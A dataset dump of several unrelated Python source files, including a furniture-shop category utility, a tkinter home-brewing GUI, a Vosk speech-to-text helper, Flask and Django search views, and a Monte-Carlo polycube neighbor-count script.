{\n1:'거실가구',\n'거실가구':1,\n2:'소파',\n'소파':2,\n3:'소파테이블',\n'소파테이블':3,\n4:'사이드테이블',\n'사이드테이블':4,\n5:'TV스탠드',\n'TV스탠드':5,\n6:'거실수납장',\n'거실수납장':6,\n7:'거실조명',\n'거실조명':7,\n8:'거실카페트',\n'거실카페트':8,\n9:'주방가구',\n'주방가구':9,\n10:'식탁',\n'식탁':10,\n11:'의자',\n'의자':11,\n12:'수납장',\n'수납장':12,\n13:'소가구',\n'소가구':13,\n14:'기타',\n'기타':14,\n15:'침실가구',\n'침실가구':15,\n16:'침대',\n'침대':16,\n17:'매트리스',\n'매트리스':17,\n18:'옷장',\n'옷장':18,\n19:'수납장',\n'수납장':19,\n20:'화장대',\n'화장대':20,\n21:'침실조명',\n'침실조명':21,\n22:'침구류',\n'침구류':22,\n23:'소가구',\n'소가구':23,\n24:'카페트',\n'카페트':24,\n25:'기타',\n'기타':25,\n26:'서재가구',\n'서재가구':26,\n27:'책상/테이블',\n'책상/테이블':27,\n28:'사무용 의자',\n'사무용 의자':28,\n29:'책장',\n'책장':29,\n30:'수납장',\n'수납장':30,\n31:'소가구',\n'소가구':31,\n32:'기타',\n'기타':32,\n33:'유아-주니어가구',\n'유아-주니어가구':33,\n34:'침대',\n'침대':34,\n35:'매트리스',\n'매트리스':35,\n36:'옷장/서랍장',\n'옷장/서랍장':36,\n37:'수납장',\n'수납장':37,\n38:'책상',\n'책상':38,\n39:'책장',\n'책장':39,\n40:'소가구',\n'소가구':40,\n41:'기타',\n'기타':41,\n42:'욕실',\n'욕실':42,\n43:'세면대',\n'세면대':43,\n44:'욕실수납',\n'욕실수납':44,\n45:'수도꼭지',\n'수도꼭지':45,\n46:'도기',\n'도기':46,\n47:'욕실용품',\n'욕실용품':47,\n48:'욕실조명',\n'욕실조명':48,\n49:'기타',\n'기타':49,\n50:'제작가구',\n'제작가구':50,\n51:'주방가구',\n'주방가구':51,\n52:'붙박이장',\n'붙박이장':52,\n53:'현관장',\n'현관장':53,\n54:'화장실가구',\n'화장실가구':54,\n55:'기타',\n'기타':55,\n56:'인테리어 소품',\n'인테리어 소품':56,\n57:'페브릭',\n'페브릭':57,\n58:'테이블웨어',\n'테이블웨어':58,\n59:'홈데코',\n'홈데코':59,\n60:'생활용품',\n'생활용품':60,\n61:'조명',\n'조명':61,\n62:'기타',\n'기타':62,\n63:'상업가구',\n'상업가구':63,\n64:'테이블',\n'테이블':64,\n65:'소파',\n'소파':65,\n66:'의자',\n'의자':66,\n67:'수납장',\n'수납장':67,\n68:'기타',\n'기타':68,\n69:'사무가구',\n'사무가구':69,\n70:'사무용 책상',\n'사무용 책상':70,\n71:'사무용 의자',\n'사무용 의자':71,\n72:'회의용 테이블',\n'회의용 테이블':72,\n73:'회의용 의자',\n'회의용 의자':73,\n74:'기타',\n'기타':74,\n }\n return d\n\ndef get_shop_category_list():\n shop_category_dict = get_shop_category_dictionary()\n l = []\n for i in xrange(1,75,1):\n cur = (str(i), shop_category_dict[i])\n l.append(cur)\n return l\n\ndef get_shop_category_1st_list():\n ret = [1,9,15,26,33,42,50,56,63,69]\n return ret\n\ndef get_shop_category_2nd_list():\n ret = []\n shop_category_1st_list = get_shop_category_1st_list()\n for i in xrange(1,75,1):\n if i in shop_category_1st_list:\n continue\n ret.append(i)\n return ret\n\ndef get_shop_category_tree():\n shop_category_1st_list = get_shop_category_1st_list()\n ret = [ [] for i in xrange(len(shop_category_1st_list))]\n ret[0] = [ i for i in xrange(2,9) ]\n ret[1] = [ i for i in xrange(10,15)]\n ret[2] = [ i for i in xrange(16,26)]\n ret[3] = [ i for i in xrange(27,33)]\n ret[4] = [ i for i in xrange(34,42)]\n ret[5] = [ i for i in xrange(43,50)]\n ret[6] = [ i for i in xrange(51,56)]\n ret[7] = [ i for i in xrange(57,63)]\n ret[8] = [ i for i in xrange(64,69)]\n ret[9] = [ i for i in xrange(70,75)]\n\n return ret\n\ndef get_all_category():\n shop_category_dictionary = 
get_shop_category_dictionary()\n shop_category_tree = get_shop_category_tree()\n ret_category = []\n for i in xrange(len(shop_category_tree)):\n first_category_id = shop_category_tree[i][0]-1\n first_category_name = shop_category_dictionary[first_category_id]\n second_categories = []\n for j in xrange(len(shop_category_tree[i])):\n second_category_id = shop_category_tree[i][j]\n second_category_name = shop_category_dictionary[second_category_id]\n d = {\n 'category_id': str(second_category_id),\n 'category_name': str(second_category_name)\n }\n second_categories.append(d)\n d = {\n 'category_id': first_category_id,\n 'category_name': first_category_name,\n 'child_categories': second_categories\n }\n ret_category.append(d)\n return ret_category\n\ndef convert_price_to_won(price):\n if str(price).find(',') != -1:\n return price\n reverse_str_price = str(price)[::-1]\n ret = ''\n for i in xrange(len(reverse_str_price)):\n ret = str(reverse_str_price[i])+ret\n next_i = i+1\n if next_i < len(reverse_str_price) and next_i % 3 == 0:\n ret = ','+ret\n return ret\n\n#\n# return { 'si': [(),(),...],\n# 'gu': [(),(),...],\n# 'dong': [(),(),...] }\n#\ndef get_address_list():\n with open('/home/howsmart/howsmart/app/address.json','r') as fp:\n r = json.loads(fp.read())\n ret = {\n 'si': [('전체','전체')],\n 'gu': [('전체','전체')],\n 'dong': [('전체','전체')]\n }\n for si in r:\n ret['si'].append((si['name'],si['name']))\n for gu in si['items']:\n ret['gu'].append((gu['name'],gu['name']))\n for dong in gu['items']:\n ret['dong'].append((dong['name'],dong['name']))\n return ret\n\ndef get_area_name(area_id):\n l = [u'10평대 미만',u'10평대',u'20평대',u'30평대',u'40평대',u'50평대 이상']\n return l[int(area_id)-1];\n\ndef get_price_name(price_id):\n l = [u'5만원 미만',u'5만원 ~ 10만원',u'10만원 ~ 20만원',u'20만원 ~ 50만원',u'50만원 ~ 100만원',u'100만원 이상']\n return l[int(price_id)-1];\n\ndef get_price_range(price_id):\n l = [(0,50000),(50000,100000),(100000,200000),(200000,500000),(500000,1000000),(1000000,50000000)]\n return l[int(price_id)-1];\n","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
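One caveat worth noting about the dictionary above: it mixes id-to-name and name-to-id pairs in a single literal, and repeated names such as '수납장', '소가구', and '기타' are duplicate keys, so only the last id for each repeated name survives. A minimal sketch of the pitfall and of a two-map layout that keeps every id (the names here are placeholders):

```python
from collections import defaultdict

# Duplicate keys in a dict literal silently overwrite one another, so a
# combined id<->name mapping loses the earlier ids for repeated names.
d = {12: 'cabinet', 'cabinet': 12, 19: 'cabinet', 'cabinet': 19}
assert d['cabinet'] == 19  # the 'cabinet' -> 12 entry is gone

# Keeping the two directions separate preserves every id per name.
id_to_name = {12: 'cabinet', 19: 'cabinet'}
name_to_ids = defaultdict(list)
for cat_id, name in id_to_name.items():
    name_to_ids[name].append(cat_id)
assert name_to_ids['cabinet'] == [12, 19]
```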
+{"seq_id":"476286956","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\nfrom tkinter import ttk\nimport collections\n\nLARGE_FONT = (\"Verdana\", -11)\n\nclass WindowMaker(tk.Tk):\n def __init__(self, *args, **kwargs):\n super().__init__()\n\n self.container = tk.Frame(self)\n #self.container.resizeable (0,0)\n self.container.grid()\n self.container.grid_rowconfigure(0, weight=1)\n self.container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n frame_name = [Information, Tools, Recipes, MainMenu]\n for page in frame_name:\n name=page.__name__\n frame = page(self.container, self)\n self.frames[name] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n def create_buttons(self, text1, text2, text3):\n self.button1 = tk.Label(self, text=text1, bg=\"dim gray\", font=LARGE_FONT)\n self.button2 = tk.Label(self, text=text2, bg=\"dim gray\", font=LARGE_FONT)\n self.button3 = tk.Label(self, text=text3, bg=\"dim gray\", font=LARGE_FONT)\n self.exit_button = tk.Label(self, text=\"Exit\", bg=\"dim gray\", font=LARGE_FONT)\n self.style_menu(text1, text2, text3)\n\n def style_menu(self, text1, text2, text3):\n self.button_navigation = collections.OrderedDict([(text1, self.button1), (\"Save Recipe\", self.button2),\n (\"Load Recipe\", self.button3), (\"Quit\", self.exit_button)])\n\n for value, key in enumerate(self.button_navigation):\n self.button_navigation[key].grid(column=0, row=value)\n self.button_navigation[key].config(height=8, width=24)\n self.button_navigation[key].bind(\"\", lambda event:self.enter_label(event))\n self.button_navigation[key].bind(\"\", lambda event:self.leave_label(event))\n\n def enter_label(self, event):\n event.widget.config(bg=\"gray\")\n\n def leave_label(self, event):\n event.widget.config(bg=\"dim gray\")\n\n def bind_exit(self):\n self.exit_button.bind(\"\", lambda event: self.quit_application())\n\n def bind_main_menu(self):\n self.button1.bind(\"\", lambda event: self.raise_frame(\"MainMenu\"))\n\n def raise_frame(self, page):\n frame = self.frames[page]\n frame.tkraise()\n\n def quit_application(self):\n self.controller.destroy()\n\n\nclass MainMenu(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n self.create_buttons(\"Recipes\", \"Information\", \"Tools\")\n self.style_buttons(\"Recipes\", \"Information\", \"Tools\")\n self.beer_images()\n self.bind_exit()\n\n def beer_images(self):\n self.image_path = Image.open(\"beer.jpeg\")\n self.image_file = ImageTk.PhotoImage(self.image_path)\n self.image_label = tk.Label(self, image=self.image_file, borderwidth=0)\n self.image_label.image = self.image_file\n self.image_label.grid(row=0, column=1, rowspan=4)\n\n def style_buttons(self, page_name1, page_name2, page_name3):\n self.button1.bind(\"\", lambda event:self.click_button(event, page_name1))\n self.button2.bind(\"\", lambda event:self.click_button(event, page_name2))\n self.button3.bind(\"\", lambda event:self.click_button(event, page_name3))\n\n def click_button(self, event, page_name):\n if page_name == \"Recipes\":\n self.change_page(page_name)\n elif page_name == \"Information\":\n self.change_page(page_name)\n elif page_name == \"Tools\":\n self.change_page(page_name)\n\n def change_page(self, page_name):\n self.controller.raise_frame(page_name)\n\n\nclass Recipes(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n self.create_buttons(\"Main 
Menu\", \"Save Recipe\", \"Load Recipe\")\n self.button_function = {\"MainMenu\": self.button1, \"Save Recipe\": self.button2, \"Load Recipe\": self.button3}\n self.bind_click_buttons()\n self.bind_main_menu()\n self.bind_exit()\n\n self.malt_entry = tk.Text(self, height=6, width=93)\n self.hops_entry = tk.Text(self, height=6, width=93)\n self.yeast_entry = tk.Text(self, height=6, width=93)\n self.notes_entry = tk.Text(self, height=6, width=93)\n\n self.text_entry_widgets = collections.OrderedDict([(\"Enter Malt Here...\", self.malt_entry), (\"Enter Hops Here...\", self.hops_entry),\n (\"Enter Yeast Here...\", self.yeast_entry), (\"Enter Notes Here...\", self.notes_entry)])\n\n grid=0\n for key in self.text_entry_widgets:\n self.text_widget(self.text_entry_widgets[key], key, grid)\n grid += 1\n\n def text_widget(self, entry, text_displayed, grid):\n entry.insert(\"end\", text_displayed)\n entry.grid(row=grid, column=1)\n\n def bind_click_buttons(self):\n for key, value in self.button_function.items():\n value.bind(\"\", lambda event, key=key: self.click_button(event, key))\n\n def click_button(self, event, key):\n if key == \"MainMenu\":\n self.change_page(key)\n elif key == \"Save Recipe\":\n self.save_recipe()\n elif key == \"Load Recipe\":\n self.load_recipe()\n\n def change_page(self, page_name):\n self.controller.raise_frame(page_name)\n\n def save_recipe(self):\n self.file = filedialog.asksaveasfile(mode=\"w\", defaultextension=\"txt\")\n self.file.close()\n with open(self.file.name, \"w\") as recipe_file:\n for entries in self.text_entry_widgets:\n text_save = self.text_entry_widgets[entries].get(\"1.0\", \"end-1c\")\n recipe_file.write(text_save)\n\n def load_recipe(self):\n self.file_name = filedialog.askopenfilename()\n with open(self.file_name, \"r\") as recipe_file:\n if self.malt_entry.get(\"1.0\", \"end-1c\"):\n self.malt_entry.delete(1.0, \"end\")\n self.malt_entry.insert(\"end\", str(recipe_file.read()))\n\nclass Information(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller=controller\n tk.Frame.__init__(self, parent)\n\n self.create_buttons(\"Main Menu\", \"\", \"\")\n self.bind_main_menu()\n\n self.beer_images(\"hops.jpeg\", 0, 1, 2, \"https://byo.com/resources/hops\")\n self.beer_images(\"malt.jpeg\", 0, 2, 2, \"https://byo.com/resources/grains\")\n self.beer_images(\"yeast.jpeg\", 2, 1, 2, \"https://byo.com/resources/yeast\")\n self.beer_images(\"water.jpeg\", 2, 2, 2, \"https://www.google.com.au/search?q=harambe&espv=2&source=lnms&tbm=isch&sa=X&ved=0ahUKEwi3j5OGmpPOAhXDoJQKHYUHD18Q_AUICSgC&biw=1440&bih=664\")\n\n def beer_images(self, file_name, row, col, rspan, url):\n image_path = Image.open(file_name)\n image_file = ImageTk.PhotoImage(image_path)\n image_label = tk.Label(self, image=image_file, borderwidth=0)\n image_label.image = image_file\n image_label.bind(\"\", lambda event: webbrowser.open(url))\n image_label.grid(row=row, column=col, rowspan=rspan)\n\n\nclass Tools(tk.Frame, WindowMaker):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n print(\"You are in the info page\")\n self.create_buttons(\"ABV Calculator\", \"IBU Calculator\", \"Strike Water Calculator\")\n self.bind_main_menu()\n self.bind_exit()\n\n\n\nif __name__ == '__main__':\n app = WindowMaker()\n app.resizable(width=False, height=False)\n app.title(\"Brewing App\")\n app.geometry(\"830x440\")\n 
app.mainloop()\n","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":7778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
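The GUI above switches pages by stacking every frame in the same grid cell and lifting one with tkraise(); a minimal self-contained sketch of just that pattern:

```python
import tkinter as tk

# Every page occupies the same grid cell; raising one hides the others.
root = tk.Tk()
container = tk.Frame(root)
container.grid(sticky="nsew")

frames = {}
for name, color in [("PageA", "lightblue"), ("PageB", "lightgreen")]:
    frame = tk.Frame(container, width=200, height=120, bg=color)
    frame.grid(row=0, column=0, sticky="nsew")
    frames[name] = frame

def raise_frame(name):
    frames[name].tkraise()

raise_frame("PageA")
# root.mainloop()  # uncomment to interact
```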
+{"seq_id":"149796408","text":"import tkinter.scrolledtext as s\nfrom tkinter import END\nimport re\nMEETING = \"Welcome to my application I hope you enjoy it. For any questions you can write me on my email: il.vsl0110@gmail.com \\n\"\n\nclass Console:\n namespace = None\n def __init__(self, hero):\n self.curr_val = []\n self.pre_string = None\n self.hero = hero\n self.namespace = hero.vars\n self.txt = s.ScrolledText(width=100, height=15)\n self.txt.insert(1.0, MEETING)\n self.txt.bind('', lambda x: self.get_vals(x, self.curr_val if (len(self.curr_val) > 0) else None, self.namespace))\n def write(self, text):\n self.txt.insert(float(len(self.txt.get('1.0', END))), text)\n\n def get_string(self):\n return self.txt.get('1.0', END)\n\n def get_vals(self, event, names, namespace):\n self.namespace = namespace\n if names != None:\n a = self.txt.get('1.0', END)\n data = []\n for i in a.split():\n if not i in self.pre_string:\n data.append(i)\n for i in range(len(data)):\n namespace.set_var(names[i], data[i])\n self.curr_val = []\n else:\n a = self.txt.get('1.0', END).split('\\n')[-2]\n if a == 'cls':\n self.txt.delete('1.0', END)\n def destroy(self):\n self.txt.destroy()","sub_path":"Console.py","file_name":"Console.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"255155965","text":"from vosk import Model, KaldiRecognizer, SetLogLevel\nimport subprocess\nimport json\n\ndef speech_to_text(filename, model_dir='model'):\n SetLogLevel(0)\n sample_rate = 16000\n model = Model(model_dir)\n rec = KaldiRecognizer(model, sample_rate)\n\n process = subprocess.Popen(['ffmpeg', '-loglevel', 'quiet', '-i',\n filename,\n '-ar', str(sample_rate), '-ac', '1', '-f', 's16le', '-'],\n stdout=subprocess.PIPE)\n\n ret = []\n while True:\n data = process.stdout.read(4000)\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n r = rec.Result()\n ret.append(r)\n else:\n r = rec.PartialResult()\n ret.append(r)\n ret.append(rec.FinalResult())\n\n ret = [json.loads(i) for i in ret]\n ret = [i for i in ret if 'result' in i]\n ret = [i['text'] for i in ret]\n\n result_string = '. '.join(ret)\n return result_string","sub_path":"speech_recognizer/spech2text.py","file_name":"spech2text.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"542726417","text":"## Imports\nfrom flask import Flask, render_template, request\nfrom contact import contactPage\nfrom search import searchPage\n\n\n## Register the Contact Form in the Main\napp = Flask(__name__)\napp.register_blueprint(contactPage, url_prefix=\"\")\napp.register_blueprint(searchPage, url_prefix=\"\")\n\n@app.errorhandler(404) \ndef invalid_route(e): \n return render_template('404.html') \nif __name__ == '__main__':\n app.run(debug=True,threaded=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"62186000","text":"import re\r\n\r\nfrom django.shortcuts import render, get_object_or_404, render_to_response\r\nfrom django.http import Http404\r\nfrom django.core import serializers\r\n\r\n# Create your views here.\r\n\r\nfrom django.http import HttpResponse\r\nfrom django.views.generic import ListView, TemplateView\r\nfrom django.core.paginator import PageNotAnInteger, Paginator, EmptyPage\r\n\r\nfrom .models import Information\r\n\r\n\r\nclass IndexView(TemplateView):\r\n template_name = 'search/index.html'\r\n\r\nclass AboutView(TemplateView):\r\n template_name = 'search/about.html'\r\n\r\nclass InstructionView(TemplateView):\r\n template_name = 'search/instruction.html'\r\n\r\ndef search_list(request):\r\n search_key = request.GET.get('search_key')\r\n search_type = request.GET.get('search_type')\r\n\r\n # Get Search Type and Values\r\n if request.method == 'POST' and len(request.POST['search_values']) > 0:\r\n search_values = request.POST['search_values']\r\n try:\r\n matchObj = re.match(r\"^([^=]+)=([^\\n]+)\", search_values)\r\n search_type = matchObj.group(1)\r\n search_key = matchObj.group(2)\r\n except:\r\n error = {'message': '无法理解你的意思呢...'}\r\n return render(request, 'search/index.html', {'error': error})\r\n\r\n if search_type == 'ip':\r\n whois = Information.objects(inetnum__icontains=search_key) # 不区分大小写的包含匹配\r\n elif search_type == 'netname':\r\n whois = Information.objects(netname__icontains=search_key)\r\n elif search_type == 'country':\r\n whois = Information.objects(country__iexact=search_key) # 不区分大小写的完全匹配\r\n elif search_type == 'source':\r\n whois = Information.objects(source__iexact=search_key)\r\n elif search_type == 'descr':\r\n whois = Information.objects(descr__icontains=search_key)\r\n else:\r\n whois = Information.objects.all()\r\n paginator = Paginator(whois, 25) # Show 25 contacts per page\r\n page = request.GET.get('page')\r\n try:\r\n contacts = paginator.page(page)\r\n except PageNotAnInteger:\r\n # If page is not an integer, deliver first page.\r\n contacts = paginator.page(1)\r\n except EmptyPage:\r\n # If page is out of range (e.g. 9999), deliver last page of results.\r\n contacts = paginator.page(paginator.num_pages)\r\n return render_to_response('search/search_list.html',\r\n {\"contacts\": contacts, 'search_key': search_key, 'search_type': search_type})\r\n","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"345317522","text":"# todo: approximate (using Monte-Carlo method) and plot the distribution of number_of_neighbors as a function of the number_of_elements\n\nimport queue\nimport random\nimport sys\nfrom multiprocessing import Pool\n\nimport numpy as np\n\nfrom aggregate import AGGREGATE\n\ndebug = True\nBLOCK = 1\nAIR = 2\n\n\nclass Air(object):\n AIR_UNKOWN = 1\n AIR_EXTERNAL = 2\n AIR_INTERNAL = 3\n\n def __init__(self, position):\n self.position = position # a tuple of (x,y,z)\n self.type = Air.AIR_UNKOWN\n\n\nclass Block(object):\n def __init__(self, position, connections):\n self.position = position # a tuple of (x,y,z)\n self.connections = connections # a list of tuples of (x,y,z) positions of neighboring cubes\n self.connection_count = len(self.connections)\n\n\ndef get_aggregate(node_cnt):\n return AGGREGATE(None, [None], node_cnt, no_sim=True).tree\n\n\ndef compute_interior_nodes(node_cnt):\n # get the structure\n structure = get_aggregate(node_cnt)\n\n # find bounding box\n x_max_node = None\n x_min, x_max = 0, 0\n y_min, y_max = 0, 0\n z_min, z_max = 0, 0\n\n for x, y, z in structure:\n # print(x,y,z)\n if x < x_min:\n x_min = x\n elif x >= x_max:\n x_max = x\n x_max_node = (x, y, z)\n\n if y < y_min:\n y_min = y\n elif y > y_max:\n y_max = y\n\n if z < z_min:\n z_min = z\n elif z > z_max:\n z_max = z\n # print(x_min, x_max)\n # print(y_min, y_max)\n # print(z_min, z_max)\n\n # calc size of matrix\n x_size = x_max - x_min + 3\n y_size = y_max - y_min + 3\n z_size = z_max - z_min + 3\n\n # compute offsets\n x_offset = -1 * x_min + 1\n y_offset = -1 * y_min + 1\n z_offset = -1 * z_min + 1\n\n # reserve matrix\n matrix = np.zeros(shape=(x_size, y_size, z_size), dtype=object)\n\n node_queue_1 = queue.Queue() # queue of Block Objects\n node_queue_2 = queue.Queue() # queue of Block Objects\n\n air_queue = queue.Queue() # queue of Air Objects\n\n to_evaluate_queue = queue.Queue() # queue of tuples of coordinates\n\n # Add connection to parent node for each node. Runs in O(36n)=O(n) time\n for node in structure:\n for child in structure[node]: # max of 6 children\n if node not in structure[child]: # list so traverse; max of 6 connections.\n structure[child].append(node)\n\n # fill in the matrix with nodes & fill queues with nodes\n for x, y, z in structure:\n node = (x + x_offset, y + y_offset, z + z_offset)\n # print(node)\n tmp = Block(node, structure[(x,y,z)])\n matrix[node] = (BLOCK, tmp)\n node_queue_1.put(node) # used to construct neighboring air search space\n node_queue_2.put(tmp) # used to determine interior nodes\n # print(matrix)\n\n # Add air nodes to matrix + fill air_queue\n while not node_queue_1.empty():\n node = node_queue_1.get()\n x, y, z = node\n\n # add neighboring cells to air queue if they are empty and valid cells.\n # x neighbors\n for i in range(-1, 2):\n for j in range(-1, 2):\n for k in range(-1, 2):\n if x + i < 0 or x + i >= x_size:\n continue\n if y + j < 0 or y + j >= y_size:\n continue\n if z + k < 0 or z + k >= z_size:\n continue\n if matrix[x + i, y + j, z + k] != 0:\n continue\n # create new Air Object + add to queue and matrix\n tmp_air = Air((x + i, y + j, z + k))\n air_queue.put(tmp_air)\n matrix[(x + i, y + j, z + k)] = (AIR, tmp_air)\n\n\n # determine which node is guarenteed to be an exterior node. 
Start here\n    x, y, z = x_max_node\n    node = (x + x_offset+1, y + y_offset, z + z_offset)\n    # print(\"shape\", matrix.shape)\n    # print(x_max_node)\n    # print(\"Priming: %s to be AIR_EXTERNAL\"%str(node))\n    tmp_air = matrix[node]\n    tmp_air[1].type = Air.AIR_EXTERNAL\n    to_evaluate_queue.put(tmp_air[1])\n\n    continue_looping = not to_evaluate_queue.empty()\n    # flood local air to determine which cells are external air\n    while continue_looping:\n        curr_cell = to_evaluate_queue.get()\n        # print(\"evaluating: %s\" %str(curr_cell.position))\n        x, y, z = curr_cell.position\n\n        # x neighbors\n        for i in [-1, 1]:\n            if x + i < 0 or x + i >= x_size:\n                # print(\"out of scope\")\n                continue\n            cell = matrix[x + i, y, z]\n            if cell == 0 or cell[0] == BLOCK or cell[1].type == Air.AIR_EXTERNAL:\n                # print(cell)\n                # print(\"not unknown air.\")\n                continue\n            cell[1].type = Air.AIR_EXTERNAL\n            to_evaluate_queue.put(cell[1])\n\n        # y neighbors\n        for i in [-1, 1]:\n            if y + i < 0 or y + i >= y_size:\n                # print(\"out of scope\")\n                continue\n            cell = matrix[x, y + i, z]\n            if cell == 0 or cell[0] == BLOCK or cell[1].type == Air.AIR_EXTERNAL:\n                # print(cell)\n                # print(\"not unknown air.\")\n                continue\n\n            cell[1].type = Air.AIR_EXTERNAL\n            to_evaluate_queue.put(cell[1])\n\n        # z neighbors\n        for i in [-1, 1]:\n            if z + i < 0 or z + i >= z_size:\n                # print(\"out of scope\")\n                continue\n            cell = matrix[x, y, z + i]\n            if cell == 0 or cell[0] == BLOCK or cell[1].type == Air.AIR_EXTERNAL:\n                # print(cell)\n                # print(\"not unknown air.\")\n                continue\n            cell[1].type = Air.AIR_EXTERNAL\n\n            to_evaluate_queue.put(cell[1])\n        continue_looping = not to_evaluate_queue.empty()\n\n    node_neighbor_cnt_queue = queue.Queue()\n\n    while not node_queue_2.empty():\n        curr_cell = node_queue_2.get()\n        # print(\"Considering:\", curr_cell.position)\n        x, y, z = curr_cell.position\n\n        # x neighbors\n        for i in [-1, 1]:\n            if x + i < 0 or x + i >= x_size:\n                continue\n            cell = matrix[x + i, y, z]\n            if debug:\n                assert cell != 1, \"Invalid cell type.\"\n            if cell[0] == AIR and cell[1].type != Air.AIR_EXTERNAL:\n                # print(cell[1].position, cell[1].type)\n                curr_cell.connection_count += 1\n\n        # y neighbors\n        for i in [-1, 1]:\n            if y + i < 0 or y + i >= y_size:\n                continue\n            cell = matrix[x, y + i, z]\n            if debug:\n                assert cell != 1, \"Invalid cell type.\"\n            if cell[0] == AIR and cell[1].type != Air.AIR_EXTERNAL:\n                # print(cell[1].position, cell[1].type)\n                curr_cell.connection_count += 1\n\n        # z neighbors\n        for i in [-1, 1]:\n            if z + i < 0 or z + i >= z_size:\n                continue\n            cell = matrix[x, y, z + i]\n            if debug:\n                assert cell != 1, \"Invalid cell type.\"\n            if cell[0] == AIR and cell[1].type != Air.AIR_EXTERNAL:\n                # print(cell[1].position, cell[1].type)\n                curr_cell.connection_count += 1\n\n        node_neighbor_cnt_queue.put(curr_cell.connection_count)\n\n    neighbor_frequencies = np.zeros(shape=6)\n    while not node_neighbor_cnt_queue.empty():\n        neighbor_cnt = node_neighbor_cnt_queue.get()\n        if neighbor_cnt == 0:\n            continue\n        neighbor_frequencies[neighbor_cnt - 1] += 1\n\n    return neighbor_frequencies\n\n\ndef get_neighbor_counts(node_cnt):\n    # generate aggregate\n    structure = get_aggregate(node_cnt)\n\n    # remove the origin.
Each node has 1 parent except the origin which has none.\n    origin = structure.pop((0, 0, 0))\n\n    # calculate neighbor counts\n    # each node has 1 parent with the exception of the origin which has 0 parents.\n    neighbor_counts = [len(d) + 1 for d in\n                       structure.values()]\n    # add the origin back in\n    neighbor_counts.append(len(origin))\n\n    # if in debug, assert truth values\n    if debug:\n        if node_cnt > 1:\n            assert (min(neighbor_counts) > 0), \"Error with generating polycube\"\n        else:\n            assert (min(neighbor_counts) >= 0), \"Error with generating polycube\"\n        assert (max(neighbor_counts) < 7), \"Error with generating polycube\"\n\n    # calculate neighbor frequencies\n    neighbor_frequencies = np.zeros(shape=6)\n    # print(neighbor_counts)\n    for n in neighbor_counts:\n        if n == 0:\n            continue\n        neighbor_frequencies[n - 1] += 1\n    return neighbor_frequencies\n\n\ndef compute_work(node_cnt, iteration_number, ttl_iteration_cnt, seed_offset=0):\n    \"\"\"\n    wrapper method for get_neighbor_counts which also sets the seed + keeps track of which iteration this is.\n    :param node_cnt: number of nodes to include in our polynode\n    :param iteration_number: which iteration we are running\n    :param ttl_iteration_cnt: total number of iterations we plan to run. Needed for seeding calculations\n    :param seed_offset: how to adjust the seed.\n    :return: tuple of node_cnt, iteration_number, and the frequency of num neighbors\n    \"\"\"\n    # TODO: Decide if this seeding is good or not.\n    random.seed(seed_offset + iteration_number + node_cnt * ttl_iteration_cnt)\n    neighbor_frequencies = compute_interior_nodes(node_cnt)\n    neighbor_frequencies /= node_cnt\n    return node_cnt, iteration_number, neighbor_frequencies\n\n\nif __name__ == \"__main__\":\n    # compute_interior_nodes(10)\n    # exit(0)\n    assert len(\n        sys.argv) >= 3, \"Please run as python NAME.py <ttl_node_count> <num_iterations> \" \\\n                        \"[seed_offset]\"\n    num_iterations = int(sys.argv[2])\n    ttl_node_count = int(sys.argv[1])\n\n    # num_iterations = 1\n    # ttl_node_count = 4\n    if len(sys.argv) == 4:\n        global_seed_offset = int(sys.argv[3])\n    else:\n        global_seed_offset = 0\n\n    np.set_printoptions(suppress=True, formatter={'float_kind': lambda x: '%5.2f' % x})\n\n    data = np.zeros(shape=(num_iterations, 6))\n\n    # used for parallel computation\n    process_count = 12\n    pool = Pool(processes=process_count)\n\n    # compute the work\n    iterations_list = range(num_iterations)\n    res = [pool.apply_async(compute_work, args=(ttl_node_count, iter_num, num_iterations, global_seed_offset)) for iter_num in iterations_list]\n    for n, r in enumerate(res):\n        node_count, iter_num, ret = r.get()\n        data[iter_num] = ret\n        if n%1000 == 0:\n            sys.stdout.write(\"\\n%d\\n\"%(n//1000))\n            sys.stdout.flush()\n    pool.close()\n    pool.join()\n\n    import pickle\n    with open(\"%d_cubes_%d_iterations.p\"%(ttl_node_count, num_iterations), \"wb\") as f:\n        pickle.dump(data, f)\n","sub_path":"approx_dist_of_num_of_neighbors.py","file_name":"approx_dist_of_num_of_neighbors.py","file_ext":"py","file_size_in_byte":10936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
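The exterior-air labeling above is a breadth-first flood fill seeded from a cell known to lie outside the structure; any air cell the fill never reaches is interior. A 2D miniature of the same idea:

```python
from collections import deque
import numpy as np

# Mark all empty cells reachable from a corner as external; whatever empty
# cells remain are enclosed by blocks (interior air).
AIR, BLOCK = 0, 1
grid = np.array([
    [0, 0, 0, 0, 0],
    [0, 1, 1, 1, 0],
    [0, 1, 0, 1, 0],   # the middle 0 is fully enclosed
    [0, 1, 1, 1, 0],
    [0, 0, 0, 0, 0],
])

external = np.zeros_like(grid, dtype=bool)
queue = deque([(0, 0)])  # a padded corner is guaranteed to be outside
external[0, 0] = True
while queue:
    x, y = queue.popleft()
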